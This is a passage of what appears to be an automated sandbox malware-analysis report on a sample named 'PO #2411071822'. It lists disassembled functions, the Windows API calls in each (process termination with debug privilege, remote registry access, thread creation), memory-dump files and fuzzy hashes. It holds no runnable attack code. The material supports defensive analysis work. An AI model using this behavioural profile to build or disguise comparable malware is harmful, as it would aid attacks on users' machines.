                                                                                                              • Instruction Fuzzy Hash: C4D1CD31604200DFD715EF25C991B6EBBE0AF84314F18896EF9899B3A2DB74DC41CB5A
                                                                                                              Function 0044B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0044B3F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InvalidateRect
                                                                                                              • String ID:
                                                                                                              • API String ID: 634782764-0
                                                                                                              • Opcode ID: 0e1afc1d9d3fba2ca507d1738548bffe5370c4024a03918b8546f0f39010e953
                                                                                                              • Instruction ID: 407442b10a134d5153b4e8519192ee138da205833c0400e8b2b8b3764ced5a42
                                                                                                              • Opcode Fuzzy Hash: 0e1afc1d9d3fba2ca507d1738548bffe5370c4024a03918b8546f0f39010e953
                                                                                                              • Instruction Fuzzy Hash: 6551C770A00204BFFF249F25CC85BAE7BA4EB05718F644117FA15D62E1D779E9408BD9
                                                                                                              Function 003FA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0045DB1B
                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0045DB3C
                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0045DB51
                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0045DB6E
                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0045DB95
                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0045DBA0
                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0045DBBD
                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0045DBC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1268354404-0
                                                                                                              • Opcode ID: 69934ec1ba5605bbe194facb50a9ec2ab66629c0e7d9180221a81010ebea1745
                                                                                                              • Instruction ID: f45263290d22cb94dd44cd370de89b1252c6d8441b0c746a444a504df99ba225
                                                                                                              • Opcode Fuzzy Hash: 69934ec1ba5605bbe194facb50a9ec2ab66629c0e7d9180221a81010ebea1745
                                                                                                              • Instruction Fuzzy Hash: 75519EB0A00609EFDB21DF65CC81FAA77B9AF08350F100129FA0AD76A1D7B4EC84DB55
                                                                                                              Function 00427555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00425FA6,?), ref: 00426ED8
                                                                                                                • Part of subcall function 00426EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00425FA6,?), ref: 00426EF1
                                                                                                                • Part of subcall function 004272CB: GetFileAttributesW.KERNEL32(?,00426019), ref: 004272CC
                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004275CA
                                                                                                              • _wcscmp.LIBCMT ref: 004275E2
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004275FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 793581249-0
                                                                                                              • Opcode ID: 8b11652b902d31fef82c5ae7038f019d8915692ea9ca82cfad2e556d8f17411c
                                                                                                              • Instruction ID: 815b660f7d943b3b8f915b2fe7193446d70f815b7183336a7775588683d1ef81
                                                                                                              • Opcode Fuzzy Hash: 8b11652b902d31fef82c5ae7038f019d8915692ea9ca82cfad2e556d8f17411c
                                                                                                              • Instruction Fuzzy Hash: DF5153B2A092299ADF54EB54E8419DE73BCAF08314F4040EFF605E3541EA7896C5CB68
                                                                                                              Function 003FEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 003FEAEB
                                                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 003FEB32
                                                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 0045DC86
                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0045DAD1,00000004,00000000,00000000), ref: 0045DCF2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ShowWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1268545403-0
                                                                                                              • Opcode ID: 164f16746fa7656178dd821b5b2176fe23965cf2113da679314d95729d3a267e
                                                                                                              • Instruction ID: c7508e65d4c12116d74b9e911688ccd521c0c5077f80911664ab6435d0c003b6
                                                                                                              • Opcode Fuzzy Hash: 164f16746fa7656178dd821b5b2176fe23965cf2113da679314d95729d3a267e
                                                                                                              • Instruction Fuzzy Hash: C9410A70B0D284DBD7374B288D8DA3A7A99BF51306F1A041EE34786A71D6B47C44D316
                                                                                                              Function 0041B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0041AEF1,00000B00,?,?), ref: 0041B26C
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0041AEF1,00000B00,?,?), ref: 0041B273
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0041AEF1,00000B00,?,?), ref: 0041B288
                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0041AEF1,00000B00,?,?), ref: 0041B290
                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0041AEF1,00000B00,?,?), ref: 0041B293
                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0041AEF1,00000B00,?,?), ref: 0041B2A3
                                                                                                              • GetCurrentProcess.KERNEL32(0041AEF1,00000000,?,0041AEF1,00000B00,?,?), ref: 0041B2AB
                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0041AEF1,00000B00,?,?), ref: 0041B2AE
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0041B2D4,00000000,00000000,00000000), ref: 0041B2C8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1957940570-0
                                                                                                              • Opcode ID: 05e98fcf7047fc7fe3107fc4f25f583e2cbfbc308220c9b43f0debe1a5d9f70a
                                                                                                              • Instruction ID: eddb91b5be683bb03e36069d7e3bb973100c5104480ae0dfc3d85cb42ef1261c
                                                                                                              • Opcode Fuzzy Hash: 05e98fcf7047fc7fe3107fc4f25f583e2cbfbc308220c9b43f0debe1a5d9f70a
                                                                                                              • Instruction Fuzzy Hash: 3901AC75B40344BFE610ABA5DC49F5B7BACEB89711F014421FA05DB291D6B498408B66
                                                                                                              Function 0043C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                              • API String ID: 0-572801152
                                                                                                              • Opcode ID: 6535e81023625ba3c374dee4ad2da242a514ce1528565a91bc7e132efb270045
                                                                                                              • Instruction ID: 69af0c33f7172408576b43de5826d07bc06b9e2a49fdcf099e53f3e12ab5e189
                                                                                                              • Opcode Fuzzy Hash: 6535e81023625ba3c374dee4ad2da242a514ce1528565a91bc7e132efb270045
                                                                                                              • Instruction Fuzzy Hash: 8EE1B171A0021AABDF14DFA4D881AAE77B5EF4C354F14902AE905BB381D778AD41CB98
                                                                                                              Function 004316DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                                • Part of subcall function 003FC6F4: _wcscpy.LIBCMT ref: 003FC717
                                                                                                              • _wcstok.LIBCMT ref: 0043184E
                                                                                                              • _wcscpy.LIBCMT ref: 004318DD
                                                                                                              • _memset.LIBCMT ref: 00431910
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                              • String ID: X$p2Il2I
                                                                                                              • API String ID: 774024439-1299268612
                                                                                                              • Opcode ID: 04a072d6f2dfd7c3c4e82dcb2c166011d47ff8b72fdc52241b050f3040b1ee8d
                                                                                                              • Instruction ID: 5ff0934083dbfc7aa4dc64e8afa14d690c996a2489822b053b5dc946fdaef99a
                                                                                                              • Opcode Fuzzy Hash: 04a072d6f2dfd7c3c4e82dcb2c166011d47ff8b72fdc52241b050f3040b1ee8d
                                                                                                              • Instruction Fuzzy Hash: D9C1A0355043909FC715EF25C981A9FB7E0BF89354F004A2EF9899B2A2DB74EC05CB86
                                                                                                              Function 003E86C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: Q\E$[$\$\$]$^
                                                                                                              • API String ID: 2102423945-1026548749
                                                                                                              • Opcode ID: c8a35f5500cd3bd5c0209e4b47dc22a456198a88aa16ff1b7df849e00449b019
                                                                                                              • Instruction ID: 51407756523ca2cc0dad19be72b80e9c414215c8ed826d354f94529c8cde65f0
                                                                                                              • Opcode Fuzzy Hash: c8a35f5500cd3bd5c0209e4b47dc22a456198a88aa16ff1b7df849e00449b019
                                                                                                              • Instruction Fuzzy Hash: 4151B171D002699BCF25CF99C8817AEB7B2FF94304F258266D818B7391E7309D89CB85
                                                                                                              Function 00449A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00449B19
                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00449B2D
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00449B47
                                                                                                              • _wcscat.LIBCMT ref: 00449BA2
                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00449BB9
                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00449BE7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                              • String ID: SysListView32
                                                                                                              • API String ID: 307300125-78025650
                                                                                                              • Opcode ID: 4b87daf9520bfc55ab737e76002bc8a9198ddb8ddf9516c079179636662ed7b0
                                                                                                              • Instruction ID: 198cd40979afdc356572d80ac50e41dd021e236f5eb9c9214535684b1619e4f3
                                                                                                              • Opcode Fuzzy Hash: 4b87daf9520bfc55ab737e76002bc8a9198ddb8ddf9516c079179636662ed7b0
                                                                                                              • Instruction Fuzzy Hash: F341B070A40348AFEB219FA4CC85BEB77A8EF08350F10442BF545A7291D7B99D85DB68
                                                                                                              Function 0044172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00426532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00426554
                                                                                                                • Part of subcall function 00426532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00426564
                                                                                                                • Part of subcall function 00426532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004265F9
                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0044179A
                                                                                                              • GetLastError.KERNEL32 ref: 004417AD
                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004417D9
                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00441855
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00441860
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00441895
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                              • String ID: SeDebugPrivilege
                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                              • Opcode ID: d0ea693d4a04dd13b02a35b5868f3c3003dabc7e32b89601e297f2a47c9f6bd2
                                                                                                              • Instruction ID: ad1668acd269fb7107bd9d3ab076bdf499156c55ef6654b30a650b872a03c237
                                                                                                              • Opcode Fuzzy Hash: d0ea693d4a04dd13b02a35b5868f3c3003dabc7e32b89601e297f2a47c9f6bd2
                                                                                                              • Instruction Fuzzy Hash: 7741B271700200AFDB05EF55C9D5F6E77A1AF44304F05805AFA069F3E2DBB899408B59
                                                                                                              Function 00425819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 004258B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IconLoad
                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                              • API String ID: 2457776203-404129466
                                                                                                              • Opcode ID: 4be94b1bdea08e9d4ff8f14add8906db09e372693e8f65878bae01dcc81c1123
                                                                                                              • Instruction ID: fc8ebaa51400b06b1de792dd681bd28f18b194fa920d6c5854b2b12782ea1c1b
                                                                                                              • Opcode Fuzzy Hash: 4be94b1bdea08e9d4ff8f14add8906db09e372693e8f65878bae01dcc81c1123
                                                                                                              • Instruction Fuzzy Hash: 7F11083570D752BAEB107A55AC82E6B279C9F27314F60003BF500E62C1E7FCAE11426D
                                                                                                              Function 0042A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0042A806
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafeVartype
                                                                                                              • String ID:
                                                                                                              • API String ID: 1725837607-0
                                                                                                              • Opcode ID: e6e61600f56211bb4e635e3c2ab9741e375ae09c36e72295c73f4997dbff574b
                                                                                                              • Instruction ID: ea69ae85ef39940e828136744fb67659002ee9994ccb3a4fe17d1f0eca2c8410
                                                                                                              • Opcode Fuzzy Hash: e6e61600f56211bb4e635e3c2ab9741e375ae09c36e72295c73f4997dbff574b
                                                                                                              • Instruction Fuzzy Hash: FDC18175A0022ADFDB00DF94E481BAEB7F4FF08315F24446AEA05E7341D738A955CB9A
                                                                                                              Function 00426B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00426B63
                                                                                                              • LoadStringW.USER32(00000000), ref: 00426B6A
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00426B80
                                                                                                              • LoadStringW.USER32(00000000), ref: 00426B87
                                                                                                              • _wprintf.LIBCMT ref: 00426BAD
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00426BCB
                                                                                                              Strings
                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00426BA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                              • Opcode ID: 5aee370ceb8e7dedb131cd90b0f663a156765d9a99b2b65d359c956e1ad61cf7
                                                                                                              • Instruction ID: 4246998158fa121ba60c8d3c7fd328aa933d60bb831aad8be39c4de1538d25f6
                                                                                                              • Opcode Fuzzy Hash: 5aee370ceb8e7dedb131cd90b0f663a156765d9a99b2b65d359c956e1ad61cf7
                                                                                                              • Instruction Fuzzy Hash: 440117F6E002587FE711A7949D89EE7766CD704304F4045A6F746E2041EAB49E844B79
                                                                                                              Function 00442B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00442BF6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharConnectRegistryUpper
                                                                                                              • String ID:
                                                                                                              • API String ID: 2595220575-0
                                                                                                              • Opcode ID: 141fba354ed2cf796e9f381b08e1c51c20eadb5a209a28467456a499135b6fbb
                                                                                                              • Instruction ID: 99ed2ffc9516c3b68fd502c688236f44146d94d519d2e0e1982f3162b7b2bfb6
